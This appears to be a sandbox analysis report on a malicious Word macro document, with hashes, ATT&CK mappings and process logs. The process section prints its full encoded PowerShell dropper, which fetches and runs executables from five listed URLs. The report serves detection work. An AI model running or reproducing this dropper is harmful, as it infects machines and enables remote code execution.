94175f6404af2c6de995aa6f8f37bdb2faeafe5f952297b6f13c3052cefcb618

General

Target

94175f6404af2c6de995aa6f8f37bdb2faeafe5f952297b6f13c3052cefcb618.doc
Size

155KB
MD5

3d0805bb03b8caac44c23db4ed76b5b6
SHA1

e35a8776ad6e02f2920cac3b55f62a9cf5f516c2
SHA256

94175f6404af2c6de995aa6f8f37bdb2faeafe5f952297b6f13c3052cefcb618
SHA512

e6d86520cfcaa999a3c9dde12f11721354fcb35a26f00a4b702db2671aa52479dcf51a05558a5ae17c9cb224c466a103d114a14e28e50f3d929df7844097902f

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://www.bilgiegitimonline.com/wp-admin/mXWp/

exe.dropper

https://www.yanjiaozhan.com/wp-includes/ug7/

exe.dropper

http://barabooseniorhigh.com/En/JHS/

exe.dropper

http://www.majoristanbul.com/cgi-bin/1OF/

exe.dropper

http://bloodybits.com/edwinjefferson.com/jx7/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3772	1044	powershell.exe	83

Blocklisted process makes network request 4 IoCs

flow	pid	Process
55	3772	powershell.exe
67	3772	powershell.exe
75	3772	powershell.exe
78	3772	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1884	WINWORD.EXE
1884	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3772	powershell.exe
3772	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3772	powershell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1884	WINWORD.EXE
1884	WINWORD.EXE
1884	WINWORD.EXE
1884	WINWORD.EXE
1884	WINWORD.EXE
1884	WINWORD.EXE
1884	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\94175f6404af2c6de995aa6f8f37bdb2faeafe5f952297b6f13c3052cefcb618.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e JABZAEEAWgBjAEMAWgBCAD0AKAAnAG0AJwArACcAdwAxAFUAQQBDACcAKQA7ACQAdABBAEEARwBBAEMAPQAmACgAJwBuAGUAdwAtAG8AYgBqACcAKwAnAGUAJwArACcAYwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAG8AUQB3AGMAQQBEAD0AKAAnAGgAdAB0AHAAOgAvAC8AdwB3AHcAJwArACcALgBiACcAKwAnAGkAbABnACcAKwAnAGkAZQBnAGkAdABpACcAKwAnAG0AbwBuAGwAaQBuAGUALgBjAG8AbQAnACsAJwAvAHcAcAAtAGEAZABtAGkAbgAvAG0AWABXAHAAJwArACcALwBAAGgAJwArACcAdAB0AHAAJwArACcAcwA6AC8ALwB3AHcAJwArACcAdwAuAHkAJwArACcAYQBuACcAKwAnAGoAaQBhAG8AJwArACcAegBoAGEAJwArACcAbgAuAGMAbwBtACcAKwAnAC8AdwAnACsAJwBwAC0AaQBuAGMAbAB1ACcAKwAnAGQAZQBzACcAKwAnAC8AdQBnADcALwBAAGgAdAB0AHAAOgAvAC8AYgBhAHIAYQBiAG8AbwBzAGUAbgBpAG8AcgBoAGkAZwBoAC4AYwBvAG0AJwArACcALwBFAG4ALwBKAEgAUwAnACsAJwAvAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AC8ALwB3AHcAdwAuAG0AYQBqAG8AcgBpAHMAdABhAG4AYgB1AGwALgAnACsAJwBjAG8AbQAvAGMAJwArACcAZwBpACcAKwAnAC0AYgBpAG4ALwAxACcAKwAnAE8AJwArACcARgAvAEAAaAB0AHQAcAA6AC8AJwArACcALwBiAGwAbwAnACsAJwBvAGQAeQBiAGkAdABzAC4AYwBvACcAKwAnAG0ALwBlACcAKwAnAGQAdwBpAG4AagBlAGYAZgBlAHIAcwBvAG4ALgAnACsAJwBjAG8AbQAvACcAKwAnAGoAeAAnACsAJwA3AC8AJwApAC4AKAAnAFMAcABsACcAKwAnAGkAdAAnACkALgBJAG4AdgBvAGsAZQAoACcAQAAnACkAOwAkAGMAbwBaAEEAQQBBAHcAQQA9ACgAJwBhAFoAJwArACcAWgBVACcAKwAnAEMAQQBBAEEAJwApADsAJAB6AEIAQQBCAEQAVQA0AEEAIAA9ACAAKAAnADgAJwArACcANAA5ACcAKQA7ACQAWABEAEEAQQBBAEEAPQAoACcASABjACcAKwAnAG8AQQBVAEEAQQBRACcAKQA7ACQATwBVAEIAQQA0AFUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHoAQgBBAEIARABVADQAQQArACgAJwAuAGUAJwArACcAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGQAWABjAEEAeABBAFEAIABpAG4AIAAkAG8AUQB3AGMAQQBEACkAewB0AHIAeQB7ACQAdABBAEEARwBBAEMALgAoACcARABvAHcAJwArACcAbgAnACsAJwBsAG8AYQAnACsAJwBkAEYAaQBsAGUAJwApAC4ASQBuAHYAbwBrAGUAKAAkAGQAWABjAEEAeABBAFEALAAgACQATwBVAEIAQQA0AFUAKQA7ACQARABBAEcAVQBVAEEAVQA9ACgAJwBPACcAKwAnAFEAQwBCAGsAawBHACcAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABPAFUAQgBBADQAVQApAC4AIgBMAGUAbgBnAGAAVABIACIAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewAmACgAJwBJACcAKwAnAG4AJwArACcAdgBvACcAKwAnAGsAZQAtAEkAdABlAG0AJwApACAAJABPAFUAQgBBADQAVQA7ACQAUgBBAEIAYwBVADQARABBAD0AKAAnAHAAJwArACcAQQB4AEMAWgAnACsAJwBVACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABoAEEAVQBEAEQAQQA9ACgAJwBJAFgAawAnACsAJwBRADEAJwArACcAeAAnACkAOwA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3772

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1884-143-0x00007FFF82750000-0x00007FFF82760000-memory.dmp

Filesize
64KB

Download
memory/1884-130-0x00007FFF82750000-0x00007FFF82760000-memory.dmp

Filesize
64KB

Download
memory/1884-131-0x00007FFF82750000-0x00007FFF82760000-memory.dmp

Filesize
64KB

Download
memory/1884-133-0x00007FFF82750000-0x00007FFF82760000-memory.dmp

Filesize
64KB

Download
memory/1884-137-0x0000026D995B0000-0x0000026D995B4000-memory.dmp

Filesize
16KB

Download
memory/1884-135-0x00007FFF80350000-0x00007FFF80360000-memory.dmp

Filesize
64KB

Download
memory/1884-132-0x00007FFF82750000-0x00007FFF82760000-memory.dmp

Filesize
64KB

Download
memory/1884-136-0x00007FFF80350000-0x00007FFF80360000-memory.dmp

Filesize
64KB

Download
memory/1884-134-0x00007FFF82750000-0x00007FFF82760000-memory.dmp

Filesize
64KB

Download
memory/1884-146-0x00007FFF82750000-0x00007FFF82760000-memory.dmp

Filesize
64KB

Download
memory/1884-145-0x00007FFF82750000-0x00007FFF82760000-memory.dmp

Filesize
64KB

Download
memory/1884-144-0x00007FFF82750000-0x00007FFF82760000-memory.dmp

Filesize
64KB

Download
memory/3772-138-0x0000013BC2740000-0x0000013BC2762000-memory.dmp

Filesize
136KB

Download
memory/3772-141-0x00007FFF963D0000-0x00007FFF96E91000-memory.dmp

Filesize
10.8MB

Download
memory/3772-140-0x00007FFF963D0000-0x00007FFF96E91000-memory.dmp

Filesize
10.8MB

Download
memory/3772-139-0x00007FFF963D0000-0x00007FFF96E91000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads